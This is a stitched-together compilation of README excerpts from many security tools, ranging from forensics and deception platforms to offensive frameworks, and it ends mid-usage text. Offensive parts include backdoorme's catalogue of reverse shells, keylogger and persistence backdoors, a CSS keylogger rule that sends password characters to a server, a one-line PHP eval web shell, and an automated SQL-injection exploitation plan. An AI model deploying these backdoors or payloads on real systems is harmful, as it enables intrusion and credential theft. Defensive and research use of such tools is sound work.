• exploits - modules that take advantage of identified vulnerabilities
• creds - modules designed to test credentials against network services
• scanners - modules that check if a target is vulnerable to any exploit
• payloads - modules that are responsible for generating payloads for various architectures and injection points
• generic - modules that perform generic attacks

• future
• requests
• paramiko
• pysnmp
• pycrypto

• bluepy - bluetooth low energy

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

cd routersploit
git pull

$ git clone https://github.com/DefectDojo/django-DefectDojo
$ cd django-DefectDojo
$ ./setup.bash
$ ./run_dojo.bash

• DefectDojo Python API: pip install defectdojo_api or clone the repository.

$ sudo apt-get install python3 python3-pip python3-tk nmap                                 
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt

$ sudo python dependencies.py

$ python master.py

>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
 + Target 1 Set!
>>

>> use shell/metasploit
 + Using current target 1.
 + Using Metasploit backdoor...
(msf) >>

(msf) >> show options
Backdoor options:

Option  Value  Description  Required
------  -----  -----------  --------
name  initd  name of the backdoor  False
...
(msf) >> set name apache
 + name => apache
(msf) >> show options
Backdoor options:

Option  Value  Description  Required
------  -----  -----------  --------
name  apache  name of the backdoor  False
...

• Auxiliary
  • keylogger - Adds a keylogger to the system and gives the option to email results back to you.
  • simplehttp - installs python's SimpleHTTP server on the client.
  • user - adds a new user to the target.
  • web - installs an Apache Server on the client.
• Escalation
  • setuid - the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root. ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.
  • shell - the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.
• Shell
  • bash - uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
  • bash2 - a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
  • sh - Similar to the first bash backdoor, but redirects input to /bin/sh.
  • sh2 - Similar to the second bash backdoor, but redirects input to /bin/sh.
  • metasploit - employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
  • java - creates a socket connection using libraries from Java and compiles the backdoor on the target.
  • ruby - uses ruby's libraries to create a connection, then redirects to /bin/bash.
  • netcat - uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
  • netcat_traditional - utilizes netcat-traditional's -e option to create a reverse shell.
  • perl - a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
  • php - runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module
  • python - uses a short python script to perform commands and send output back to the user.
  • web - ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.
• Access
  • remove_ssh - removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
  • ssh_key - creates RSA key and copies to target for a passwordless ssh connection.
  • ssh_port - Adds a new port for ssh.
• Windows
  • windows - Uses msfvenom to create a windows backdoor.

(msf) >> add poison
 + Poison module added

(msf) >> help
...
Poison module options:

Option  Value  Description  Required
------  -----  -----------  --------
name     ls    name of command to poison  False
location /bin  where to put poisoned files into  False

• Poison
• Performs bin poisoning on the target computer - it compiles an executable to call a system utility and an existing backdoor.
• For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.
• Cron

• Adds an existing backdoor to the root user's crontab to run with a given frequency.

• Web
• Sets up a web server and places a web page which triggers the backdoor.
• Simply visit the site with your listener open and the backdoor will begin.
• User
• Adds a new user to the target.
• Startup
• Allows for backdoors to be spawned with the bashrc and init files.
• Whitelist
• Whitelists an IP so that only that IP can connect to the backdoor.

1. Download repository git clone https://github.com/maxchehab/CSS-Keylogging
2. Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu's icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).
3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
4. Click Load unpacked extension… to pop up a file-selection dialog.
5. Select the css-keylogger-extension in the directory which you downloaded this repository.

1. yarn
2. yarn start

1. Open a website that uses a controlled component framework such as React. https://instagram.com.
2. Press the extension C on the top right of any webpage.
3. Type your password.
4. Your password should be captured by the express server.

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

• Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities. 
• Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
• Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.

• Modularity is key. Each component of the installation and configuration process should be modular. This allows for individuals to tailor their packer image in the most flexible way.
• Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.
• Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post. 
• Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
• Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

• Windows Secure Boot is Enabled.
• Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
• Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
• Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)
• Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)
• LLMNR is Disabled.
• NBT is Disabled.
• WPAD is Removed.
• Powershell v2 is Removed.
• SMB v1 is Removed.
• Application handlers for commonly-abused file extensions are changed to notepad.exe.

• Windows Defender Anti-Virus Real-Time Scanning is Disabled.
• Windows Defender SmartScreen is Disabled.
• Windows Defender Credential Guard is Disabled.
• Windows Defender Exploit Guard is Disabled.
• Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.
• Windows Defender Application Guard is Disabled.
• Windows Defender Application Guard does not enforce isolation.

• Windows Defender Anti-Virus Real-Time Scanning is Enabled.
• Windows Defender SmartScreen is Enabled and applied to All Traffic.
• Windows Defender Credential Guard is Enabled.
• Windows Defender Exploit Guard is Enabled.
• Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.
• Windows Defender Application Guard is Enabled.
• Windows Defender Application Guard enforces isolation.

• Windows Event Log Auditing is enabled. (Palantir Windows Event Forwarding Guidance).
• Windows Powershell Auditing is enabled. (Palantir Windows Event Forwarding Guidance).
• Sysinternals Sysmon is installed and configured. (SwiftonSecurity Ruleset)

• Windows 10 telemetry settings are configured to minimize collection.
• Cortana, diagnostics, tracking, and other services are disabled.
• Windows Error Reporting (WER) is disabled.
• Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered. 
• Microsoft Guidance for reducing telemetry and data collection has been implemented.

• APKTool (FLARE)

• ACE
• Bloodhound / Sharphound
• CimSweep
• Dumpsterfire
• EndGame Red Team Automation (RTA)
• Kansa
• Posh-Git
• Invoke-ATTACKAPI
• LOLBAS (Living Off the Land Binaries And Scripts)
• OSX Collector
• Posh-SecMod
• Posh-Sysmon
• PowerForensics
• PowerSploit
• Practical Malware Analysis Labs (FLARE)
• Revoke-Obfuscation
• Yara (FLARE)

• Ollydbg (FLARE)
• OllyDump (FLARE)
• OllyDumpEx (FLARE)
• Ollydbg2 (FLARE)
• OllyDump2Ex (FLARE)
• x64dbg (FLARE)
• Windbg (FLARE)

• IDA Free Trial (FLARE)
• Binary Ninja Demo (FLARE)
• Radare2 (FLARE)

• OffVis (FLARE)
• OfficeMalScanner (FLARE)
• PDFId (FLARE)
• PDFParser (FLARE)
• PDFStreamDumper (FLARE)

• DE4Dot (FLARE)
• DNSpy (FLARE)
• DotPeek (FLARE)
• ILSpy (FLARE)

• FFDec (FLARE)

• Amcache Parser
• AppCompatCache Parser
• IISGeolocate
• JLECmd
• LECmd
• JumpList Explorer
• PECmd
• Registry Explorer
• Regshot (FLARE)
• Shellbags Explorer
• Timeline Explorer
• TSK (The Sleuthkit)
• Volatility
• X-Ways Forensics Installer Manager (XWFIM)

• FileInsight (FLARE)
• HxD (FLARE)
• 010 Editor (FLARE)

• JD-GUI (FLARE)
• Dex2JAR

• Burp Free
• FakeNet-NG (FLARE)
• Wireshark (FLARE)

• DIE (FLARE)
• EXEInfoPE (FLARE)
• Malware Analysis Pack (MAP) (FLARE)
• PEiD (FLARE)
• ExplorerSuite (CFF Explorer) (FLARE)
• PEStudio (FLARE)
• PEview (FLARE)
• Resource Hacker (FLARE)
• VirusTotal Uploader

• Active Directory
• Azure Management
• Pester

• Cryptography
• Hexdump
• OLETools
• LXML
• Pandas
• Passivetotal
• PEFile
• PyCryptodome
• Scapy
• Shodan
• Sigma
• Visual C++ for Python
• Vivisect
• WinAppDBG
• Yara-Python

• Grouper
• Inveigh
• Nmap
• Powershell Empire
• PowerupSQL
• PSAttack
• PSAttack Build Tool
• Responder

• AWS Command Line (AWSCLI)
• OpenSSH
• Putty
• Remote Server Administration Tools (RSAT)

• 1Password
• 7Zip
• Adobe Flash Player
• Adobe Reader
• API Monitor
• Bleachbit
• Boxstarter
• Bstrings
• Checksum
• Chocolatey
• Cmder
• Containers (Hyper-V)
• Curl
• Cyber Chef
• Docker
• DotNet 3.5
• DotNet 4
• Exiftool
• FLOSS (FLARE)
• Git
• GoLang
• Google Chrome
• GPG4Win
• Hashcalc
• Hashdeep
• Hasher
• Hashtab
• Hyper-V
• Irfanview
• Java JDK8
• Java JRE8
• JQ
• Jupyter
• Keepass
• Microsoft Edge
• Mozilla Firefox
• Mozilla Thunderbird
• Neo4j Community
• NodeJS
• Nuget
• Office365 ProPlus
• OpenVPN
• Osquery
• Python 2.7
• Qbittorrent
• RawCap
• Slack
• Sublime Text 3
• Sysinternals Suite
• Tor Browser
• UnixUtils
• UPX
• Visual C++ 2005
• Visual C++ 2008
• Visual C++ 2010
• Visual C++ 2012
• Visual C++ 2013
• Visual C++ 2015
• Visual C++ 2017
• Visual Studio Code
• Windows 10 SDK
• Windows Subsystem for Linux (WSL)
• Winlogbeat
• XorSearch
• XorStrings

• VBDecompiler

1. Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).
2. The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of windows, as well as a powershell script to configure Windows Remote Management (winrm).
3. Packer connects to the DARKSURGEON VM using WinRM and copies over all files in the helper-scripts and configuration-files directory to the host.
4. Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed. 
5. When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

1. Install packer, vagrant, and your preferred hypervisor on your host.
2. Download the repository contents to your host.
3. Download a Windows 10 Enterprise Evaluation ISO (1803).
4. Move the ISO file to your local DARKSURGEON repository.
5. Update DARKSURGEON.json with the ISO SHA1 hash and file name.
6. (Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository but you may re-build this if you don't trust it, or you would like to modify the unattend files: powershell.exe New-DARKSURGEONISO.ps1
7. Build the recipe using packer: packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

1. Install vagrant and your preferred hypervisor on your host.
2. Navigate to the DARKSURGEON repository (or the location where you've saved the DARKSURGEON box file). 
3. Perform a vagrant up: vagrant up

• WinRM is accessible from your packer host. (Test-NetConnection -ComputerName <Packer IP Address> -Port 5985)
• WinRM is allowed on the guest firewall.

• Host OS: Primary OS hosting the DejaVU virtual box. Note: Primary
  host can be OS independent Windows/Linux and can be based on
  corporate hardening guidelines.
• DejaVu Virtual Box: Debian based image containing open source deception framework to deploy multiple interactive decoys (HTTP Servers, SQL, SMB, FTP, SSH, client side – NBNS).
• Networking
  • Management Interface – An interface to access web based management console. (Recommended to be isolated from internal network.)
  • Decoy Interface – Trunk/Access interface for inbound connections from different networks towards the interactive decoys. (Recommended to block outbound connections from this interface)
  • Virtual Interfaces – Interfaces bridged with decoy interface to channel traffic towards the decoys.
• Server Dockers – Docker based service containers– HTTP(Tomcat/Apache), SQL, SMB, FTP, SSH
• Client Dockers – Docker based client container – NBNS client
• Management Console (Web + DB) – A centralized console to deploy, administer and configure all the decoys effectively along with logging and alerting dashboard to display detailed information about the alerts generated.

1. Configure Username/Password for admin panel

php config.php --username=<provide username> --password=<provide password> --email=<provide email>

2. Default URL to access admin panel - http://192.168.56.102
3. Virtualbox network adapter type should be "PCNet"(full name is something like PCnet-FAST III)
4. Set SMTP configuration on "mailalert.php" to recieve Email alerts

1. To add a decoy, we first need to add a VLAN on which we want to later deploy Decoys.
   • Select Decoy Management -> Add VLAN
   • Enter the VLAN ID. Use the “List Available VLANs” option to list the VLANs tagged on the interface.

2. To add server decoy :
   • Select Decoy Management ->Add Server Decoy
   • Provide the details for new decoy as shown below. Select the services (SMB/FTP/MySQL/FTP/Web Server/SSH) to be deployed, use dynamic or provide a static IP address.

3. Let’s do some port scan's + Auth attempts from attacker machine on server VLAN and analyze the alerts

4. View the alerts triggered when the attacker scanned our decoy and tried to authenticate.
   • Select Log Management -> List Events

1. To add Client Decoy
   • Select Decoy Management ->Add Client Decoy
   • Provide the details for new decoy as shown below. It’s recommended to place the client decoy on user VLANs to detect responder/LLMNR attacks.

2. Let’s run responder from attacker machine on end user VLAN and analyze the alerts

3. View the alerts triggered when the attacker scanned our decoy and tried to authenticated.
   • Log management -> List Events

1. Alerts can be configured based on various parameters. Example – Don’t send alerts from IP – 10.1.10.101. If certain IP’s like in-house vulnerability scanner, SCCM etc. needs to be whitelisted.

• Code Cleanup and sanitization
• Persistance on reboot
• Add client side decoys generating HTTP, FTP traffic
• ISO image
• Wiki

• it uses Shannon Entropy to find private keys.
• it supports multiprocessing for analyzing files.
• it unpacks compressed archives (e.g. zip, tar.gz etc.)
• it supports advanced search using simple rules (details below)

usage: DumpsterDiver.py [-h] -p LOCAL_PATH [-r] [-a]

• -p LOCAL_PATH - path to the folder containing files to be analyzed.
• -r, --remove - when this flag is set, then files which don't contain any secret (or anything interesting if -a flag is set) will be removed.
• -a, --advance - when this flag is set, then all files will be additionally analyzed using rules specified in 'rules.yaml' file.

pip install -r requirements.txt

• logfile - specifies a file where logs should be saved.
• excluded - specifies file extensions which you don't want to omit during a scan. There is no point in searching for hardcoded secrets in picture or video files, right?
• min_key_length and min_key_length - specifies minimum and maximum length of the secret you're looking for. Depending on your needs this setting can greatly limit the amount of false positives. For example, the AWS secret has a length of 40 bytes so if you set min_key_length and min_key_length to 40 then the DumpsterDiver will analyze only 40 bytes strings. However, it won't take into account longer strings like Azure shared key or private SSH key.

filetype: [".*"]
filetype_weight: 0
grep_words: ["*@example.com"]
grep_words_weight: 10
grep_word_occurrence: 100

filetype: [".db", ".sql"]
filetype_weight: 5
grep_words: ["*pass*", "*haslo*", "*hasło*"]
grep_words_weight: 5
grep_word_occurrence: 1

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

• Efficient: More than 20 plugins to automate post-exploitation tasks
  
  • Run commands and browse filesystem, bypassing PHP security restrictions
  • Upload/Download files between client and target
  • Edit remote files through local text editor
  • Run SQL console on target system
  • Spawn reverse TCP shells
• Stealth: The framework is made by paranoids, for paranoids
  
  • Nearly invisible by log analysis and NIDS signature detection
  • Safe-mode and common PHP security restrictions bypass
  • Communications are hidden in HTTP Headers
  • Loaded payloads are obfuscated to bypass NIDS
  • http/https/socks4/socks5 Proxy support
• Convenient: A robust interface with many crucial features
  
  • Detailed help for any command or option (type help)
  • Cross-platform on both the client and the server.
  • Powerful interface with completion and multi-command support
  • Session saving/loading feature & persistent history
  • Multi-request support for large payloads (such as uploads)
  • Provides a powerful, highly configurable settings engine
  • Each setting, such as user-agent has a polymorphic mode
  • Customisable environment variables for plugin interaction
  • Provides a complete plugin development API

• GNU/Linux
• Mac OS X

• GNU/Linux
• BSD Like
• Mac OS X
• Windows NT

• Less bugs
  • Cleaner process management. Does not leave processes running in the background (the old wifite was bad about this).
  • No longer "one monolithic script". Has working unit tests. Pull requests are less-painful!
• Speed
  • Target access points are refreshed every second instead of every 5 seconds.
• Accuracy
  • Displays realtime Power level of currently-attacked target.
  • Displays more information during an attack (e.g. % during WEP chopchop attacks, Pixie-Dust step index, etc)
• Educational
  • The --verbose option (expandable to -vv or -vvv) shows which commands are executed & the output of those commands.
  • This can help debug why Wifite is not working for you. Or so you can learn how these tools are used.
• Actively developed (as of March 2018).
• Python 3 support.
• Sweet new ASCII banner.

• No more WPS PIN attack, because it can take days on-average.
  • However, the Pixie-Dust attack is still an option.
• Some command-line arguments (--wept, --wpst, and other confusing switches).
  • You can still access some of these, try ./Wifite.py -h -v

• (Mostly) Backwards compatibile with the original wifite's arguments.
• Same text-based interface everyone knows and loves.

• Reaver (or -bully) Pixie-Dust attack (enabled by-default, force with: --wps-only)
• WPA handshake capture (enabled by-default, force with: --no-wps)
• Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
• Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
• Automatically decloaks hidden access points while scanning or attacking.
  • Note: Only works when channel is fixed. Use the -c <channel> switch.
  • Disable this via --no-deauths switch
• 5Ghz support for some wireless cards (via -5 switch).
  • Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
• Stores cracked passwords and handshakes to the current directory (--cracked)
  • Includes metadata about the access point.
• Provides commands to crack captured WPA handshakes (--crack)
  • Includes all commands needed to crack using aircrack-ng, john, hashcat, or pyrit.

• iwconfig: For identifying wireless devices already in Monitor Mode.
• ifconfig: For starting/stopping wireless devices.
• Aircrack-ng suite, includes:
  • aircrack-ng: For cracking WEP .cap files and and WPA handshake captures.
  • aireplay-ng: For deauthing access points, replaying capture files, various WEP attacks.
  • airmon-ng: For enumerating and enabling Monitor Mode on wireless devices.
  • airodump-ng: For target scanning & capture file generation.
  • packetforge-ng: For forging capture files.

• tshark: For detecting WPS networks and inspecting handshake capture files.
• reaver: For WPS Pixie-Dust attacks.
  • Note: Reaver's wash tool can be used to detect WPS networks if tshark is not found.
• bully: For WPS Pixie-Dust attacks.
  • Alternative to Reaver. Specify --bully to use Bully instead of Reaver.
  • Bully is also used to fetch PSK if reaver cannot after cracking WPS PIN.
• cowpatty: For detecting handshake captures.
• pyrit: For detecting handshake captures.

git clone https://github.com/derv82/wifite2.git
cd wifite2
./Wifite.py

• Save System - there is a complete save system, which can resume even when your pc crashed. - technology is cool
• Dorking - from the command line ( one dork ): YES - from a file: NO - from an interactive wizard: YES
• Waffing - Thanks to Ekultek, WhatWaf now has a JSON output function. - So it's mostly finished :) - UPDATE: WhatWaf is completly working with AutoSQLi. Sqlmap is the next big step
• Sqlmapping - I'll look if there is some sort of sqlmap API, because I don't wanna use execute this time (: - Sqlmap is cool
• REPORTING: YES
• Rest API: NOPE

• Log handling (logging with different levels, cleanly)
• Translate output (option to translate the save, which is in pickle format, to a json/csv save)
• Spellcheck (correct wrongly spelled words and conjugational errors. I'm on Neovim right now and there is no auto-spelling check)

1. AutoSQLi will be a python application which will, automatically, using a dork provided by the user, return a list of websites vulnerable to a SQL injection.
2. To find vulnerable websites, the users firstly provide a dork DOrking, which is passed to findDorks.py, which returns a list of URLs corresponding to it.
3. Then, AutoSQLi will do some very basic checks ( TODO: MAYBE USING SQLMAP AND IT's --smart and --batch function ) to verify if the application is protected by a Waf, or if one of it's parameters is vulnerable.
4. Sometimes, websites are protected by a Web Application Firewall, or in short, a WAF. To identify and get around of these WAFs, AutoSQLi will use WhatWaf.
5. Finally, AutoSQLi will exploit the website using sqlmap, and give the choice to do whatever he wants !

• application/json
• application/x-www-form-urlencoded
• multipart/form-data

Usage: 
                .:/+ssyyyyyyso+/:.                
            -/s                    s/.            
         .+|        SleuthQL         |y+.         
       -s| SQL Injection Discovery Tool |s-       
     .shh|                              |ohs.     
    +hhhho+shhhhhhhhhhhs/hhhhhhhhhhhhhhhh.-hh/    
  `shhhhhhy:./yo/:---:/:`hhhhhhhhhhhhhhhs``ohho   
  shhhhhhhhh-`-//::+os: +hhhhhhhhh+shhhh.o-/hhho  
 +hhhhhhhhh:+y/.:shy/  /hhhhhhhhh/`ohhh-/h-/hhhh/ 
.hhhhhhhhhsss`.yhhs` .shhhhhhhh+-o-hhh-/hh`ohhhhh`
+hhhhhhhhhhhhyoshh+. `shhhhhs/-oh:ohs.ohh+`hhhhhh/
shhhhhhhhhhhhhhhhhhh/  -//::+yhy:oy::yhhy`+hhhhhho
yhhhhhhhhhhhhhhhhhhh:-:.   `+y+-/:/yhhhy.-hhhhhhhs
shhhhhhhhhhhhhhhhhhh+ :/o+:.``  -hhhhhs`.hhhhhhhho
+hhhhhhhs/hhhhhhhhhhy::/:/yhhhy: .+yy/ :hhhhhhhhh/
.hhhhhhh:.hhhhhhhhhhhhhhhhhhhhhhs/-  -shhhhhhhhhh`
 +hhhhhh+ /hhhhhhhhhhhhhhhhhhhhho/:`+hhhhhhhhhhh/ 
  shhhhy+  -shhhhhhhhhhhhhhhhhhh.// yhhhhhhhhhho  
  `ohh+://+/.`-/++ooooooooooyhhhhy.`hhhhhhhhhho   
    /hhhhhhhhhso++//+++oooo+:`sh+`-yhhhhhhhhh/    
     .s                                    s.     
       -s      Rhino Security Labs       s-       
         .+y    Dwight  Hohnstein     y+.         
            ./s                    s/.            
                .:/+osyyyyyyso+/-.                

sleuthql.py -d example.com -f burpproxy.xml

SleuthQL is a script for automating the discovery of requests matching
SQL-like parameter names and values. When discovered, it will display
any matching parameters and paths that may be vulnerable to SQL injection.
It will also create a directory with SQLMap ready request files.



Options:
  -h, --help            show this help message and exit
  -d DOMAINS, --domains=DOMAINS
                        Comma separated list of domains to analyze. i.e.:
                        google.com,mozilla.com,rhinosecuritylabs.com
  -f PROXY_XML, --xml=PROXY_XML
                        Burp proxy history xml export to parse. Must be base64
                        encoded.
  -v, --verbose         Show verbose errors that occur during parsing of the
                        input XML.

• Search available username:

  ./namechk.sh <username> -au

  
  
• Search available username on specifics websites:

  ./namechk.sh <username> -au -co

  
  
• Search available username list:

  ./namechk.sh -l -au

  
  
• Search used username:

  ./namechk.sh <username> -fu

  
  
• Search used username on specifics websites:

  ./namechk.sh <username> -fu -co

  
  
• Search used username list:

  ./namechk.sh -l -fu

• checkout and update the transform path inside Maltego
• In Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtz

• drag and drop a Postgresql DB entity onto the canvas, enter DB details.
• run the Postgresql transforms directly against a running DB

• Instead of running a nikto scan directly from Maltego, I've opted to include a field to for a Nikto XML file. Nikto can take long time to run so best to manage that directly from the os.

• Connect directly to the postgres database - in progress
• Much, much, much more tranforms for actions on generated entities.

• Automatic hash type identification
• Supports MD5, SHA1, SHA2
• Can extract & crack hashes from a file
• Can find hashes from a directory, recursively
• 6 robust APIs

simple@gmail.com:21232f297a57a5a743894a0e4a801fc3
{"json@gmail.com":"d033e22ae348aeb5660fc2140aec35850c4da997"}
surrondedbytext8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918surrondedbytext

make install

buster -s <hash>

buster -f /root/hashes.txt

buster -d /root/Documents

• Fixed colors bug
• Fixed permissions bug
• Added new option to scan single target
• Added new option to scan joomla& wordpress plugins

• Install tool
git clone https://github.com/MrSqar-Ye/BadMod.git
• Install php
sudo apt-get install php
• Install php curl
sudo apt-get install php-curl

• Install tool
chmod +x INSTALL
./INSTALL

• Fast tool to get all server sites .

• Fast and accurate real-time satellite tracking using the NORAD SGP4/SDP4 algorithms.
• No software limit on the number of satellites or ground stations.
• Appealing visual presentation of the satellite data using maps, tables and polar plots (radar views).
• Allows you to group satellites into modules, each module having its own visual layout, and being customisable on its own. Of course, you can use several modules at the same time.
• Radio and antenna rotator control for autonomous trakcing.
• Efficient and detailed predictions of future satellite passes. Prediction parameters and conditions can be fine-tuned by the user to allow both general and very specialised predictions.
• Context sensitive pop-up menus allow you to quickly predict future passes by clicking on any satellite.
• Exhaustive configuration options allowing advanced users to customise both the functionality and look & feel of the program.
• Automatic updates of the Keplerian Elements from the web via HTTP, FTP, or from local files.
• Robust design and multi-platform implementation integrates gpredict well into modern computer desktop environments, including Linux, BSD, Windows, and Mac OS X.
• Free software licensed under the terms and conditions of the GNU General Public License allowing you to freely use it, learn from it, modify it, and re-distribute it.

• Artifact:
  • An item to investigate
  • Artificats can be created in two ways:
    • Using the new command or by being discoverd through module execution
• Session:
  • Cache of artifacts created after starting the Omnibus CLI
  • Each artifact in a session is given an ID to quickly identify and retrieve the artifact from the cache
  • Commands can be executed against an artifact either by providing it's name or it's corresponding session ID
• Module:
  • Python script that performs some arbitirary OSINT task against an artifact

• session
  • start a new session
• new <artifact name>
  • create a new artifact for investigation
• modules
  • display list of available modules
• open <file path>
  • load a text file list of artifacts into Omnibus as artifacts
• cat <artifact name | session id>
  • view beautified JSON database records
• ls
  • show all active artifacts
• rm
  • remove an artifact from the database
• wipe
  • clear the current artifact session

• general
  • overall commands such as help, history, quit, set, clear, banner, etc.
• artifacts
  • display commands specific to artifacts and their management
• sessions
  • display helpful commands around managing sessions
• modules
  • show a list of all available modules

• IPv4 address
• FQDN
• Email Address
• Bitcoin Address
• File Hash (MD5, SHA1, SHA256, SHA512)
• User Name

• Blockchain.info
• Censys
• ClearBit
• Cymon
• DNS subdomain enumeration
• DNS resolution
• DShield (SANS ISC)

• GeoIP lookup

• Full Contact

• Gist Scraping
• GitHub user search
• HackedEmails.com email search
• Hurricane Electric host search
• HIBP search
• Hunter.io
• IPInfo
• IPVoid
• KeyBase
• Nmap
• PassiveTotal
• Pastebin
• PGP Email and Name lookup
• RSS Feed Reader
• Shodan
• Security News Reader
• ThreatCrowd
• ThreatExpert
• TotalHash
• Twitter
• URLVoid
• VirusTotal
• Web Recon
• WHOIS

• session - start a new artifact cache
• cat <artifact name>|apikeys - pretty-print an artifacts document or view your stored API keys
• open <file path> - load a text file list of artifacts into Omnibus for investigation
• new <artifact name> - create a new artifact and add it to MongoDB and your session
• find <artifact name> - check if an artifact exists in the db and show the results

• omnibus >> report inquest.net /home/adam/intel/osint/reports/inq_report.json

• [artifact_name]_[timestamp].json

• virustotal inquest.net > vt-lookup.json

• RSS monitor
• Pastebin monitor
• Generic Pastesite monitoring
• Generic HTTP/JSON monitoring

    git clone https://github.com/GouveaHeitor/nipe
    cd nipe
    cpan install Switch JSON LWP::UserAgent

    COMMAND          FUNCTION
    install          Install dependencies
    start            Start routing
    stop             Stop routing
    restart          Restart the Nipe process
    status           See status

    Examples:

    perl nipe.pl install
    perl nipe.pl start
    perl nipe.pl stop
    perl nipe.pl restart
    perl nipe.pl status

• Report bugs in my email: hi@heitorgouvea.me

• Python 2.7.x
• git
• bottle
• requests
• yara-python

• Clone the project to your local directory (or download the zip file of the project)

$git clone https://github.com/rastrea2r/rastrea2r.git
$cd rastrea2r

• All the dependencies necessary for the tool to run can be installed within a virtual environment via the provided makefile.

$make help
help                           - display this makefile's help information
venv                           - create a virtual environment for development
clean                          - clean all files using .gitignore rules
scrub                          - clean all files, even untracked files
test                           - run tests
test-verbose                   - run tests [verbosely]
check-coverage                 - perform test coverage checks
check-style                    - perform pep8 check
fix-style                      - perform check with autopep8 fixes
docs                           - generate project documentation
check-docs                     - quick check docs consistency
serve-docs                     - serve project html documentation
dist                           - create a wheel distribution package
dist-test                      - test a wheel distribution package
dist-upload                    - upload a wheel distribution package

• Create a virtual environment with all dependencies

$make venv
//Upon successful creation of the virtualenvironment, enter the virtualenvironment as instructed, for ex:
$source /Users/ssbhat/.venvs/rastrea2r/bin/activate

• Start the rastrea2r server by going to $PROJECT_HOME/src/rastrea2r/server folder

$cd src/rastrea2r/server/
$python rastrea2r_server_v0.3.py
Bottle v0.12.13 server starting up (using WSGIRefServer())...
Listening on http://0.0.0.0:8080/

• Now execute the client program, depending on which platform you are trying to scan choose the target python script appropriately. Currently Windows, Linux and Mac platforms are supported.

$python rastrea2r_osx_v0.3.py -h
usage: rastrea2r_osx_v0.3.py [-h] [-v] {yara-disk,yara-mem,triage} ...

Rastrea2r RESTful remote Yara/Triage tool for Incident Responders

positional arguments:  {yara-disk,yara-mem,triage}

modes of operation
 yara-disk           Yara scan for file/directory objects on disk
 yara-mem            Yara scan for running processes in memory
 triage              Collect triage information from endpoint

optional arguments:
 -h, --help            show this help message and exit
 -v, --version         show program's version number and exit


Further more, the available options under each command can be viewed by executing the help option. i,e

$python rastrea2r_osx_v0.3.py yara-disk -h
usage: rastrea2r_osx_v0.3.py yara-disk [-h] [-s] path server rule

positional arguments:
